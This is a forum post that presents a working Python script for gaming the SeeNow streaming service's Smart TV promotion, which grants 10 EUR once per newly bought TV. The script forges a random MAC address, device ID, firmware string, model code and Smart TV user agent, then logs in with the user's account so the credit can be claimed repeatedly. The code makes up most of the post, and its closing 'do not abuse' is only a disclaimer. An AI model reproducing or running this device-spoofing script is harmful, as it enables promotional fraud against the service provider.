Search the Community
Showing results for tags 'seenow'.
-
Seenow has a promotion: they give you 10 EUR for free if you connect with your account on a Smart TV which has been purchased recently. This promotion is only for one TV you have. So, there must be something TV sends in order to identify itself, something unique... To keep the long story short, here is the POC in Python v 3.3: #usage: scriptname.py email@email.com password #email is the one associated with SeeNow account #password is your SeeNow password import urllib.request, urllib.parse, urllib.error import urllib.request, urllib.error, urllib.parse import json import random import string import sys def random_char(y): return ''.join(random.choice(string.ascii_letters) for x in range(y)) def randomMAC(): mac = [ 0x00, 0x16, 0x3e, random.randint(0x00, 0x7f), random.randint(0x00, 0xff), random.randint(0x00, 0xff) ] return ''.join(map(lambda x: "%02x" % x, mac)) url = 'http://www.seenow.ro/smarttv/user/login/sessionid/f' + str(random.randint(0,9)) + str(random_char(22)) + str(random.randint(0,9)) + str(random.randint(0,9)) + str(random.randint(0,9)) url = url + '?firmware=T-INFOLINK2012-0' + str(random.randint(0,9)) + str(random.randint(10,28)) url = url + '&modelCode=12_X' + str(random.randint(10,20)) + 'PLUS' url = url + '&macAddress=' + str(randomMAC()) url = url + '&deviceUniqueId=' + random.choice(string.ascii_uppercase) + str(random.randint(0,9)) + str(random_char(6)) + str(random.randint(0,9)) + str(random_char(6)) url = url + '&deviceType=0&appId=111299000393&appVersion=2.05&language=RO&language_id=1' user_agent = 'Mozilla/5.0 (SmartHub; SMART-TV; U; Linux/SmartTV; Maple2012) AppleWebKit/534.7 (KHTML, like Gecko) SmartTV Safari/534.7' values = {'email' : sys.argv[1], 'password' : sys.argv[2], 'remember' : 'false' } headers = { 'User-Agent' : user_agent, 'Content-Type' : 'application/x-www-form-urlencoded' } data = urllib.parse.urlencode(values) binary_data = data.encode('ASCII') req = urllib.request.Request(url, binary_data, headers) response = urllib.request.urlopen(req) resp = str(response.read()) tosearch = 'success' if resp.find(tosearch) > 0: print (" [X] YOU ARE LOGGED IN! Check if you have the 10 EUR into your account") print(" [+] Response: \n" + resp) Hope you'll enjoy it. Keep it safe! Do not abuse!